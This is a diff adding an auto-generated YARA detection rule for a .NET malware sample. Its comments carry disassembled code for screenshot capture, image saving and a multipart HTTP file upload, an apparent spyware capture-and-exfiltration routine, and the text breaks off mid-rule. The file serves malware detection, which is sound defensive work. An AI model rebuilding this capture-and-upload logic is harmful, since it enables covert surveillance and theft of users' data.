diff --git a/yara/expected_1c444ebe_692f7fd6.yar b/yara/expected_1c444ebe_692f7fd6.yar new file mode 100644 index 0000000..72b1498 --- /dev/null +++ b/yara/expected_1c444ebe_692f7fd6.yar @@ -0,0 +1,1651 @@ +rule super_rule_1c444 +{ + meta: + author = "CAPA Matches" + date_created = "2023-08-10" + date_modified = "2023-08-10" + description = "" + md5 = "1c444ebeba24dcba8628b7dfe5fec7c6" + strings: + /* +function Reqss.Reqss::b__4d 0x0600006d@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - save image in .NET + 133F 02 ldarg.0 + 1340 7b a8 00 00 04 ldfld _temp_image_ + 1345 02 ldarg.0 + 1346 7b 9e 00 00 04 ldfld _temp_dir1 + 134B 28 63 00 00 0a call System.Drawing.Imaging.ImageFormat::get_Jpeg + 1350 6f 64 00 00 0a callvirt System.Drawing.Image::Save + 1355 2a ret + */ + $c0 = { 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2A } + /* +function Screenss.ScreenCapture::CaptureWindow 0x06000073@1c444ebeba24dcba8628b7dfe5fec7c6 with 2 features: + - capture screenshot + - unmanaged call + 1F74 03 ldarg.1 + 1F75 28 7d 00 00 06 call GetWindowDC + 1F7A 0a stloc.0 + 1F7B 12 01 ldloca.s local(0x0001) + 1F7D fe 15 0a 00 00 02 initobj .RECT + 1F83 03 ldarg.1 + 1F84 12 01 ldloca.s local(0x0001) + 1F86 28 7f 00 00 06 call GetWindowRect + 1F8B 26 pop + 1F8C 12 01 ldloca.s local(0x0001) + 1F8E 7b 7b 00 00 04 ldfld right + 1F93 12 01 ldloca.s local(0x0001) + 1F95 7b 79 00 00 04 ldfld left + 1F9A 59 sub + 1F9B 0c stloc.2 + 1F9C 12 01 ldloca.s local(0x0001) + 1F9E 7b 7c 00 00 04 ldfld bottom + 1FA3 12 01 ldloca.s local(0x0001) + 1FA5 7b 7a 00 00 04 ldfld top + 1FAA 59 sub + 1FAB 0d stloc.3 + 1FAC 06 ldloc.0 + 1FAD 28 77 00 00 06 call CreateCompatibleDC + 1FB2 13 04 stloc.s local(0x0004) + 1FB4 06 ldloc.0 + 1FB5 08 ldloc.2 + 1FB6 09 ldloc.3 + 1FB7 28 76 00 00 06 call CreateCompatibleBitmap + 1FBC 13 05 stloc.s local(0x0005) + 1FBE 11 04 ldloc.s local(0x0004) + 1FC0 11 05 ldloc.s local(0x0005) + 1FC2 28 7a 00 00 06 call SelectObject + 1FC7 13 06 stloc.s local(0x0006) + 1FC9 11 04 ldloc.s local(0x0004) + 1FCB 16 ldc.i4.0 + 1FCC 16 ldc.i4.0 + 1FCD 08 ldloc.2 + 1FCE 09 ldloc.3 + 1FCF 06 ldloc.0 + 1FD0 16 ldc.i4.0 + 1FD1 16 ldc.i4.0 + 1FD2 20 20 00 cc 00 ldc.i4 0xcc0020 + 1FD7 28 75 00 00 06 call BitBlt + 1FDC 26 pop + 1FDD 11 04 ldloc.s local(0x0004) + 1FDF 11 06 ldloc.s local(0x0006) + 1FE1 28 7a 00 00 06 call SelectObject + 1FE6 26 pop + 1FE7 11 04 ldloc.s local(0x0004) + 1FE9 28 78 00 00 06 call DeleteDC + 1FEE 26 pop + 1FEF 03 ldarg.1 + 1FF0 06 ldloc.0 + 1FF1 28 7e 00 00 06 call ReleaseDC + 1FF6 26 pop + 1FF7 11 05 ldloc.s local(0x0005) + 1FF9 28 65 00 00 0a call System.Drawing.Image::FromHbitmap + 1FFE 13 07 stloc.s local(0x0007) + 2000 11 05 ldloc.s local(0x0005) + 2002 28 79 00 00 06 call DeleteObject + 2007 26 pop + 2008 11 07 ldloc.s local(0x0007) + 200A 2a ret + */ + $c1 = { 03 28 ?? ?? ?? ?? 0A 12 ?? FE 15 ?? ?? ?? ?? 03 12 ?? 28 ?? ?? ?? ?? 26 12 ?? 7B ?? ?? ?? ?? 12 ?? 7B ?? ?? ?? ?? 59 0C 12 ?? 7B ?? ?? ?? ?? 12 ?? 7B ?? ?? ?? ?? 59 0D 06 28 ?? ?? ?? ?? 13 ?? 06 08 09 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 16 16 08 09 06 16 16 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 11 ?? 11 ?? 28 ?? ?? ?? ?? 26 11 ?? 28 ?? ?? ?? ?? 26 03 06 28 ?? ?? ?? ?? 26 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 26 11 ?? 2A } + /* +function Uploadss.Uploadss::MultiPart 0x06000096@1c444ebeba24dcba8628b7dfe5fec7c6 with 7 features: + - create HTTP request + - get file size + - receive HTTP response + - send HTTP request + - send data + - send request in .NET + - set web proxy in .NET + 2AA8 72 01 00 00 70 ldstr "" + 2AAD 0a stloc.0 + 2AAE 03 ldarg.1 + 2AAF 28 97 00 00 0a call System.Net.WebRequest::Create + 2AB4 74 58 00 00 01 castclass System.Net.HttpWebRequest + 2AB9 0b stloc.1 + 2ABA 07 ldloc.1 + 2ABB 1c ldc.i4.6 + 2ABC 73 98 00 00 0a newobj System.Net.Cache.RequestCachePolicy::.ctor + 2AC1 6f 99 00 00 0a callvirt System.Net.WebRequest::set_CachePolicy + 2AC6 07 ldloc.1 + 2AC7 14 ldnull + 2AC8 6f 9a 00 00 0a callvirt System.Net.WebRequest::set_Proxy + 2ACD 07 ldloc.1 + 2ACE 19 ldc.i4.3 + 2ACF 6f 9b 00 00 0a callvirt System.Net.HttpWebRequest::set_AutomaticDecompression + 2AD4 07 ldloc.1 + 2AD5 20 30 75 00 00 ldc.i4 0x7530 + 2ADA 6f 9c 00 00 0a callvirt System.Net.WebRequest::set_Timeout + 2ADF 07 ldloc.1 + 2AE0 28 9d 00 00 0a call System.Text.Encoding::get_Default + 2AE5 1a ldc.i4.4 + 2AE6 8d 3d 00 00 01 newarr System.Byte + 2AEB 25 dup + 2AEC d0 b1 00 00 04 ldtoken $$method0x600002a-1 + 2AF1 28 9e 00 00 0a call System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray + 2AF6 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 2AFB 6f 9f 00 00 0a callvirt System.Net.WebRequest::set_Method + 2B00 28 a0 00 00 0a call System.DateTime::get_UtcNow + 2B05 13 1e stloc.s local(0x001E) + 2B07 12 1e ldloca.s local(0x001E) + 2B09 20 b2 07 00 00 ldc.i4 0x7b2 + 2B0E 17 ldc.i4.1 + 2B0F 17 ldc.i4.1 + 2B10 73 a1 00 00 0a newobj System.DateTime::.ctor + 2B15 28 a2 00 00 0a call System.DateTime::Subtract + 2B1A 13 1f stloc.s local(0x001F) + 2B1C 12 1f ldloca.s local(0x001F) + 2B1E 28 a3 00 00 0a call System.TimeSpan::get_TotalMilliseconds + 2B23 6a conv.i8 + 2B24 0c stloc.2 + 2B25 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2B2A 1f 14 ldc.i4.s 0x14 + 2B2C 8d 3d 00 00 01 newarr System.Byte + 2B31 25 dup + 2B32 d0 b2 00 00 04 ldtoken $$method0x600002a-2 + 2B37 28 9e 00 00 0a call System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray + 2B3C 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 2B41 0d stloc.3 + 2B42 09 ldloc.3 + 2B43 08 ldloc.2 + 2B44 8c 31 00 00 01 box System.Int64 + 2B49 28 52 00 00 0a call System.String::Concat + 2B4E 13 04 stloc.s local(0x0004) + 2B50 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2B55 18 ldc.i4.2 + 2B56 8d 3d 00 00 01 newarr System.Byte + 2B5B 13 20 stloc.s local(0x0020) + 2B5D 11 20 ldloc.s local(0x0020) + 2B5F 16 ldc.i4.0 + 2B60 1f 0d ldc.i4.s 0xd + 2B62 9c stelem.i1 + 2B63 11 20 ldloc.s local(0x0020) + 2B65 17 ldc.i4.1 + 2B66 1f 0a ldc.i4.s 0xa + 2B68 9c stelem.i1 + 2B69 11 20 ldloc.s local(0x0020) + 2B6B 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 2B70 26 pop + 2B71 07 ldloc.1 + 2B72 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2B77 1f 21 ldc.i4.s 0x21 + 2B79 8d 3d 00 00 01 newarr System.Byte + 2B7E 25 dup + 2B7F d0 b3 00 00 04 ldtoken $$method0x600002a-3 + 2B84 28 9e 00 00 0a call System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray + 2B89 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 2B8E 11 04 ldloc.s local(0x0004) + 2B90 28 a4 00 00 0a call System.String::Format + 2B95 6f a5 00 00 0a callvirt System.Net.WebRequest::set_ContentType + 2B9A 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2B9F 18 ldc.i4.2 + 2BA0 8d 3d 00 00 01 newarr System.Byte + 2BA5 13 21 stloc.s local(0x0021) + 2BA7 11 21 ldloc.s local(0x0021) + 2BA9 16 ldc.i4.0 + 2BAA 1f 2d ldc.i4.s 0x2d + 2BAC 9c stelem.i1 + 2BAD 11 21 ldloc.s local(0x0021) + 2BAF 17 ldc.i4.1 + 2BB0 1f 2d ldc.i4.s 0x2d + 2BB2 9c stelem.i1 + 2BB3 11 21 ldloc.s local(0x0021) + 2BB5 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 2BBA 11 04 ldloc.s local(0x0004) + 2BBC 28 50 00 00 0a call System.String::Concat + 2BC1 13 04 stloc.s local(0x0004) + 2BC3 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2BC8 11 04 ldloc.s local(0x0004) + 2BCA 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 2BCF 13 05 stloc.s local(0x0005) + 2BD1 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2BD6 1f 2e ldc.i4.s 0x2e + 2BD8 8d 3d 00 00 01 newarr System.Byte + 2BDD 25 dup + 2BDE d0 b4 00 00 04 ldtoken $$method0x600002a-4 + 2BE3 28 9e 00 00 0a call System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray + 2BE8 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 2BED 13 06 stloc.s local(0x0006) + 2BEF 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2BF4 1f 51 ldc.i4.s 0x51 + 2BF6 8d 3d 00 00 01 newarr System.Byte + 2BFB 25 dup + 2BFC d0 b5 00 00 04 ldtoken $$method0x600002a-5 + 2C01 28 9e 00 00 0a call System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray + 2C06 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 2C0B 13 07 stloc.s local(0x0007) + 2C0D 16 ldc.i4.0 + 2C0E 6a conv.i8 + 2C0F 13 08 stloc.s local(0x0008) + 2C11 11 08 ldloc.s local(0x0008) + 2C13 11 05 ldloc.s local(0x0005) + 2C15 8e ldlen + 2C16 69 conv.i4 + 2C17 6a conv.i8 + 2C18 58 add + 2C19 13 08 stloc.s local(0x0008) + 2C1B 04 ldarg.2 + 2C1C 6f a6 00 00 0a callvirt GetEnumerator + 2C21 13 22 stloc.s local(0x0022) + 2C23 2b 5a br.s 0x2c7f + 2C25 12 22 ldloca.s local(0x0022) + 2C27 28 a7 00 00 0a call get_Current + 2C2C 13 09 stloc.s local(0x0009) + 2C2E 11 06 ldloc.s local(0x0006) + 2C30 11 09 ldloc.s local(0x0009) + 2C32 7b a9 00 00 04 ldfld name + 2C37 28 a4 00 00 0a call System.String::Format + 2C3C 11 09 ldloc.s local(0x0009) + 2C3E 7b aa 00 00 04 ldfld value + 2C43 28 a8 00 00 0a call System.Uri::EscapeDataString + 2C48 28 50 00 00 0a call System.String::Concat + 2C4D 13 0a stloc.s local(0x000A) + 2C4F 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2C54 11 0a ldloc.s local(0x000A) + 2C56 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 2C5B 13 0b stloc.s local(0x000B) + 2C5D 11 08 ldloc.s local(0x0008) + 2C5F 18 ldc.i4.2 + 2C60 6a conv.i8 + 2C61 58 add + 2C62 13 08 stloc.s local(0x0008) + 2C64 11 08 ldloc.s local(0x0008) + 2C66 11 0b ldloc.s local(0x000B) + 2C68 8e ldlen + 2C69 69 conv.i4 + 2C6A 6a conv.i8 + 2C6B 58 add + 2C6C 13 08 stloc.s local(0x0008) + 2C6E 11 08 ldloc.s local(0x0008) + 2C70 18 ldc.i4.2 + 2C71 6a conv.i8 + 2C72 58 add + 2C73 13 08 stloc.s local(0x0008) + 2C75 11 08 ldloc.s local(0x0008) + 2C77 11 05 ldloc.s local(0x0005) + 2C79 8e ldlen + 2C7A 69 conv.i4 + 2C7B 6a conv.i8 + 2C7C 58 add + 2C7D 13 08 stloc.s local(0x0008) + 2C7F 12 22 ldloca.s local(0x0022) + 2C81 28 a9 00 00 0a call MoveNext + 2C86 2d 9d brtrue.s 0x2c25 + 2C88 de 0e leave.s 0x2c98 + 2C8A 12 22 ldloca.s local(0x0022) + 2C8C fe 16 07 00 00 1b constrained. [CLR_METADATA_TABLE_TYPESPEC] + 0x7032 0x0 Signature_BlobIndex: 5CF + 2C92 6f 2f 00 00 0a callvirt System.IDisposable::Dispose + 2C97 dc endfinally + 2C98 05 ldarg.3 + 2C99 6f aa 00 00 0a callvirt GetEnumerator + 2C9E 13 23 stloc.s local(0x0023) + 2CA0 2b 76 br.s 0x2d18 + 2CA2 12 23 ldloca.s local(0x0023) + 2CA4 28 ab 00 00 0a call get_Current + 2CA9 13 0c stloc.s local(0x000C) + 2CAB 11 07 ldloc.s local(0x0007) + 2CAD 11 0c ldloc.s local(0x000C) + 2CAF 7b ab 00 00 04 ldfld name + 2CB4 11 0c ldloc.s local(0x000C) + 2CB6 7b ac 00 00 04 ldfld filepath + 2CBB 28 ac 00 00 0a call System.IO.Path::GetFileName + 2CC0 11 0c ldloc.s local(0x000C) + 2CC2 7b ad 00 00 04 ldfld contenttype + 2CC7 28 ad 00 00 0a call System.String::Format + 2CCC 13 0d stloc.s local(0x000D) + 2CCE 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2CD3 11 0d ldloc.s local(0x000D) + 2CD5 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 2CDA 13 0e stloc.s local(0x000E) + 2CDC 11 08 ldloc.s local(0x0008) + 2CDE 18 ldc.i4.2 + 2CDF 6a conv.i8 + 2CE0 58 add + 2CE1 13 08 stloc.s local(0x0008) + 2CE3 11 08 ldloc.s local(0x0008) + 2CE5 11 0e ldloc.s local(0x000E) + 2CE7 8e ldlen + 2CE8 69 conv.i4 + 2CE9 6a conv.i8 + 2CEA 58 add + 2CEB 13 08 stloc.s local(0x0008) + 2CED 11 0c ldloc.s local(0x000C) + 2CEF 7b ac 00 00 04 ldfld filepath + 2CF4 73 24 00 00 0a newobj System.IO.FileInfo::.ctor + 2CF9 13 0f stloc.s local(0x000F) + 2CFB 11 08 ldloc.s local(0x0008) + 2CFD 11 0f ldloc.s local(0x000F) + 2CFF 6f 4f 00 00 0a callvirt System.IO.FileInfo::get_Length + 2D04 58 add + 2D05 13 08 stloc.s local(0x0008) + 2D07 11 08 ldloc.s local(0x0008) + 2D09 18 ldc.i4.2 + 2D0A 6a conv.i8 + 2D0B 58 add + 2D0C 13 08 stloc.s local(0x0008) + 2D0E 11 08 ldloc.s local(0x0008) + 2D10 11 05 ldloc.s local(0x0005) + 2D12 8e ldlen + 2D13 69 conv.i4 + 2D14 6a conv.i8 + 2D15 58 add + 2D16 13 08 stloc.s local(0x0008) + 2D18 12 23 ldloca.s local(0x0023) + 2D1A 28 ae 00 00 0a call MoveNext + 2D1F 2d 81 brtrue.s 0x2ca2 + 2D21 de 0e leave.s 0x2d31 + 2D23 12 23 ldloca.s local(0x0023) + 2D25 fe 16 08 00 00 1b constrained. [CLR_METADATA_TABLE_TYPESPEC] + 0x7034 0x0 Signature_BlobIndex: 5DC + 2D2B 6f 2f 00 00 0a callvirt System.IDisposable::Dispose + 2D30 dc endfinally + 2D31 11 08 ldloc.s local(0x0008) + 2D33 18 ldc.i4.2 + 2D34 6a conv.i8 + 2D35 58 add + 2D36 13 08 stloc.s local(0x0008) + 2D38 11 08 ldloc.s local(0x0008) + 2D3A 18 ldc.i4.2 + 2D3B 6a conv.i8 + 2D3C 58 add + 2D3D 13 08 stloc.s local(0x0008) + 2D3F 07 ldloc.1 + 2D40 11 08 ldloc.s local(0x0008) + 2D42 6f af 00 00 0a callvirt System.Net.WebRequest::set_ContentLength + 2D47 07 ldloc.1 + 2D48 6f b0 00 00 0a callvirt System.Net.WebRequest::GetRequestStream + 2D4D 13 10 stloc.s local(0x0010) + 2D4F 11 10 ldloc.s local(0x0010) + 2D51 11 05 ldloc.s local(0x0005) + 2D53 16 ldc.i4.0 + 2D54 11 05 ldloc.s local(0x0005) + 2D56 8e ldlen + 2D57 69 conv.i4 + 2D58 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2D5D 04 ldarg.2 + 2D5E 6f a6 00 00 0a callvirt GetEnumerator + 2D63 13 24 stloc.s local(0x0024) + 2D65 38 92 00 00 00 br 0x2dfc + 2D6A 12 24 ldloca.s local(0x0024) + 2D6C 28 a7 00 00 0a call get_Current + 2D71 13 11 stloc.s local(0x0011) + 2D73 11 06 ldloc.s local(0x0006) + 2D75 11 11 ldloc.s local(0x0011) + 2D77 7b a9 00 00 04 ldfld name + 2D7C 28 a4 00 00 0a call System.String::Format + 2D81 11 11 ldloc.s local(0x0011) + 2D83 7b aa 00 00 04 ldfld value + 2D88 28 a8 00 00 0a call System.Uri::EscapeDataString + 2D8D 28 50 00 00 0a call System.String::Concat + 2D92 13 12 stloc.s local(0x0012) + 2D94 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2D99 11 12 ldloc.s local(0x0012) + 2D9B 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 2DA0 13 13 stloc.s local(0x0013) + 2DA2 11 10 ldloc.s local(0x0010) + 2DA4 18 ldc.i4.2 + 2DA5 8d 3d 00 00 01 newarr System.Byte + 2DAA 13 25 stloc.s local(0x0025) + 2DAC 11 25 ldloc.s local(0x0025) + 2DAE 16 ldc.i4.0 + 2DAF 1f 0d ldc.i4.s 0xd + 2DB1 9c stelem.i1 + 2DB2 11 25 ldloc.s local(0x0025) + 2DB4 17 ldc.i4.1 + 2DB5 1f 0a ldc.i4.s 0xa + 2DB7 9c stelem.i1 + 2DB8 11 25 ldloc.s local(0x0025) + 2DBA 16 ldc.i4.0 + 2DBB 18 ldc.i4.2 + 2DBC 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2DC1 11 10 ldloc.s local(0x0010) + 2DC3 11 13 ldloc.s local(0x0013) + 2DC5 16 ldc.i4.0 + 2DC6 11 13 ldloc.s local(0x0013) + 2DC8 8e ldlen + 2DC9 69 conv.i4 + 2DCA 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2DCF 11 10 ldloc.s local(0x0010) + 2DD1 18 ldc.i4.2 + 2DD2 8d 3d 00 00 01 newarr System.Byte + 2DD7 13 26 stloc.s local(0x0026) + 2DD9 11 26 ldloc.s local(0x0026) + 2DDB 16 ldc.i4.0 + 2DDC 1f 0d ldc.i4.s 0xd + 2DDE 9c stelem.i1 + 2DDF 11 26 ldloc.s local(0x0026) + 2DE1 17 ldc.i4.1 + 2DE2 1f 0a ldc.i4.s 0xa + 2DE4 9c stelem.i1 + 2DE5 11 26 ldloc.s local(0x0026) + 2DE7 16 ldc.i4.0 + 2DE8 18 ldc.i4.2 + 2DE9 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2DEE 11 10 ldloc.s local(0x0010) + 2DF0 11 05 ldloc.s local(0x0005) + 2DF2 16 ldc.i4.0 + 2DF3 11 05 ldloc.s local(0x0005) + 2DF5 8e ldlen + 2DF6 69 conv.i4 + 2DF7 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2DFC 12 24 ldloca.s local(0x0024) + 2DFE 28 a9 00 00 0a call MoveNext + 2E03 3a 62 ff ff ff brtrue 0x2d6a + 2E08 de 0e leave.s 0x2e18 + 2E0A 12 24 ldloca.s local(0x0024) + 2E0C fe 16 07 00 00 1b constrained. [CLR_METADATA_TABLE_TYPESPEC] + 0x7032 0x0 Signature_BlobIndex: 5CF + 2E12 6f 2f 00 00 0a callvirt System.IDisposable::Dispose + 2E17 dc endfinally + 2E18 05 ldarg.3 + 2E19 6f aa 00 00 0a callvirt GetEnumerator + 2E1E 13 27 stloc.s local(0x0027) + 2E20 38 ea 00 00 00 br 0x2f0f + 2E25 12 27 ldloca.s local(0x0027) + 2E27 28 ab 00 00 0a call get_Current + 2E2C 13 14 stloc.s local(0x0014) + 2E2E 11 07 ldloc.s local(0x0007) + 2E30 11 14 ldloc.s local(0x0014) + 2E32 7b ab 00 00 04 ldfld name + 2E37 11 14 ldloc.s local(0x0014) + 2E39 7b ac 00 00 04 ldfld filepath + 2E3E 28 ac 00 00 0a call System.IO.Path::GetFileName + 2E43 11 14 ldloc.s local(0x0014) + 2E45 7b ad 00 00 04 ldfld contenttype + 2E4A 28 ad 00 00 0a call System.String::Format + 2E4F 13 15 stloc.s local(0x0015) + 2E51 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2E56 11 15 ldloc.s local(0x0015) + 2E58 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 2E5D 13 16 stloc.s local(0x0016) + 2E5F 11 10 ldloc.s local(0x0010) + 2E61 18 ldc.i4.2 + 2E62 8d 3d 00 00 01 newarr System.Byte + 2E67 13 28 stloc.s local(0x0028) + 2E69 11 28 ldloc.s local(0x0028) + 2E6B 16 ldc.i4.0 + 2E6C 1f 0d ldc.i4.s 0xd + 2E6E 9c stelem.i1 + 2E6F 11 28 ldloc.s local(0x0028) + 2E71 17 ldc.i4.1 + 2E72 1f 0a ldc.i4.s 0xa + 2E74 9c stelem.i1 + 2E75 11 28 ldloc.s local(0x0028) + 2E77 16 ldc.i4.0 + 2E78 18 ldc.i4.2 + 2E79 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2E7E 11 10 ldloc.s local(0x0010) + 2E80 11 16 ldloc.s local(0x0016) + 2E82 16 ldc.i4.0 + 2E83 11 16 ldloc.s local(0x0016) + 2E85 8e ldlen + 2E86 69 conv.i4 + 2E87 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2E8C 11 14 ldloc.s local(0x0014) + 2E8E 7b ac 00 00 04 ldfld filepath + 2E93 19 ldc.i4.3 + 2E94 17 ldc.i4.1 + 2E95 73 b1 00 00 0a newobj System.IO.FileStream::.ctor + 2E9A 13 17 stloc.s local(0x0017) + 2E9C 20 00 00 10 00 ldc.i4 0x100000 + 2EA1 8d 3d 00 00 01 newarr System.Byte + 2EA6 13 18 stloc.s local(0x0018) + 2EA8 11 17 ldloc.s local(0x0017) + 2EAA 11 18 ldloc.s local(0x0018) + 2EAC 16 ldc.i4.0 + 2EAD 11 18 ldloc.s local(0x0018) + 2EAF 8e ldlen + 2EB0 69 conv.i4 + 2EB1 6f 84 00 00 0a callvirt System.IO.Stream::Read + 2EB6 13 19 stloc.s local(0x0019) + 2EB8 2b 1c br.s 0x2ed6 + 2EBA 11 10 ldloc.s local(0x0010) + 2EBC 11 18 ldloc.s local(0x0018) + 2EBE 16 ldc.i4.0 + 2EBF 11 19 ldloc.s local(0x0019) + 2EC1 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2EC6 11 17 ldloc.s local(0x0017) + 2EC8 11 18 ldloc.s local(0x0018) + 2ECA 16 ldc.i4.0 + 2ECB 11 18 ldloc.s local(0x0018) + 2ECD 8e ldlen + 2ECE 69 conv.i4 + 2ECF 6f 84 00 00 0a callvirt System.IO.Stream::Read + 2ED4 13 19 stloc.s local(0x0019) + 2ED6 11 19 ldloc.s local(0x0019) + 2ED8 16 ldc.i4.0 + 2ED9 30 df bgt.s 0x2eba + 2EDB 11 17 ldloc.s local(0x0017) + 2EDD 6f b2 00 00 0a callvirt System.IO.Stream::Close + 2EE2 11 10 ldloc.s local(0x0010) + 2EE4 18 ldc.i4.2 + 2EE5 8d 3d 00 00 01 newarr System.Byte + 2EEA 13 29 stloc.s local(0x0029) + 2EEC 11 29 ldloc.s local(0x0029) + 2EEE 16 ldc.i4.0 + 2EEF 1f 0d ldc.i4.s 0xd + 2EF1 9c stelem.i1 + 2EF2 11 29 ldloc.s local(0x0029) + 2EF4 17 ldc.i4.1 + 2EF5 1f 0a ldc.i4.s 0xa + 2EF7 9c stelem.i1 + 2EF8 11 29 ldloc.s local(0x0029) + 2EFA 16 ldc.i4.0 + 2EFB 18 ldc.i4.2 + 2EFC 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2F01 11 10 ldloc.s local(0x0010) + 2F03 11 05 ldloc.s local(0x0005) + 2F05 16 ldc.i4.0 + 2F06 11 05 ldloc.s local(0x0005) + 2F08 8e ldlen + 2F09 69 conv.i4 + 2F0A 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2F0F 12 27 ldloca.s local(0x0027) + 2F11 28 ae 00 00 0a call MoveNext + 2F16 3a 0a ff ff ff brtrue 0x2e25 + 2F1B de 0e leave.s 0x2f2b + 2F1D 12 27 ldloca.s local(0x0027) + 2F1F fe 16 08 00 00 1b constrained. [CLR_METADATA_TABLE_TYPESPEC] + 0x7034 0x0 Signature_BlobIndex: 5DC + 2F25 6f 2f 00 00 0a callvirt System.IDisposable::Dispose + 2F2A dc endfinally + 2F2B 11 10 ldloc.s local(0x0010) + 2F2D 18 ldc.i4.2 + 2F2E 8d 3d 00 00 01 newarr System.Byte + 2F33 13 2a stloc.s local(0x002A) + 2F35 11 2a ldloc.s local(0x002A) + 2F37 16 ldc.i4.0 + 2F38 1f 2d ldc.i4.s 0x2d + 2F3A 9c stelem.i1 + 2F3B 11 2a ldloc.s local(0x002A) + 2F3D 17 ldc.i4.1 + 2F3E 1f 2d ldc.i4.s 0x2d + 2F40 9c stelem.i1 + 2F41 11 2a ldloc.s local(0x002A) + 2F43 16 ldc.i4.0 + 2F44 18 ldc.i4.2 + 2F45 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2F4A 11 10 ldloc.s local(0x0010) + 2F4C 18 ldc.i4.2 + 2F4D 8d 3d 00 00 01 newarr System.Byte + 2F52 13 2b stloc.s local(0x002B) + 2F54 11 2b ldloc.s local(0x002B) + 2F56 16 ldc.i4.0 + 2F57 1f 0d ldc.i4.s 0xd + 2F59 9c stelem.i1 + 2F5A 11 2b ldloc.s local(0x002B) + 2F5C 17 ldc.i4.1 + 2F5D 1f 0a ldc.i4.s 0xa + 2F5F 9c stelem.i1 + 2F60 11 2b ldloc.s local(0x002B) + 2F62 16 ldc.i4.0 + 2F63 18 ldc.i4.2 + 2F64 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2F69 11 10 ldloc.s local(0x0010) + 2F6B 6f 8a 00 00 0a callvirt System.IO.Stream::Flush + 2F70 11 10 ldloc.s local(0x0010) + 2F72 6f b2 00 00 0a callvirt System.IO.Stream::Close + 2F77 07 ldloc.1 + 2F78 6f b3 00 00 0a callvirt System.Net.WebRequest::GetResponse + 2F7D 74 67 00 00 01 castclass System.Net.HttpWebResponse + 2F82 13 1a stloc.s local(0x001A) + 2F84 11 1a ldloc.s local(0x001A) + 2F86 6f b4 00 00 0a callvirt System.Net.WebResponse::GetResponseStream + 2F8B 13 1b stloc.s local(0x001B) + 2F8D 11 1b ldloc.s local(0x001B) + 2F8F 73 b5 00 00 0a newobj System.IO.StreamReader::.ctor + 2F94 13 1c stloc.s local(0x001C) + 2F96 11 1c ldloc.s local(0x001C) + 2F98 6f b6 00 00 0a callvirt System.IO.TextReader::ReadToEnd + 2F9D 0a stloc.0 + 2F9E 11 1c ldloc.s local(0x001C) + 2FA0 6f b7 00 00 0a callvirt System.IO.TextReader::Close + 2FA5 11 1b ldloc.s local(0x001B) + 2FA7 6f b2 00 00 0a callvirt System.IO.Stream::Close + 2FAC 11 1a ldloc.s local(0x001A) + 2FAE 6f b8 00 00 0a callvirt System.Net.WebResponse::Close + 2FB3 de 18 leave.s 0x2fcd + 2FB5 13 1d stloc.s local(0x001D) + 2FB7 11 1d ldloc.s local(0x001D) + 2FB9 6f b9 00 00 0a callvirt System.Net.WebException::get_Response + 2FBE 6f b8 00 00 0a callvirt System.Net.WebResponse::Close + 2FC3 de 03 leave.s 0x2fc8 + 2FC5 26 pop + 2FC6 de 00 leave.s 0x2fc8 + 2FC8 de 03 leave.s 0x2fcd + 2FCA 26 pop + 2FCB de 00 leave.s 0x2fcd + 2FCD 06 ldloc.0 + 2FCE 2a ret + */ + $c2 = { 72 ?? ?? ?? ?? 0A 03 28 ?? ?? ?? ?? 74 ?? ?? ?? ?? 0B 07 1C 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 07 14 6F ?? ?? ?? ?? 07 19 6F ?? ?? ?? ?? 07 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 07 28 ?? ?? ?? ?? 1A 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 20 ?? ?? ?? ?? 17 17 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6A 0C 28 ?? ?? ?? ?? 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F 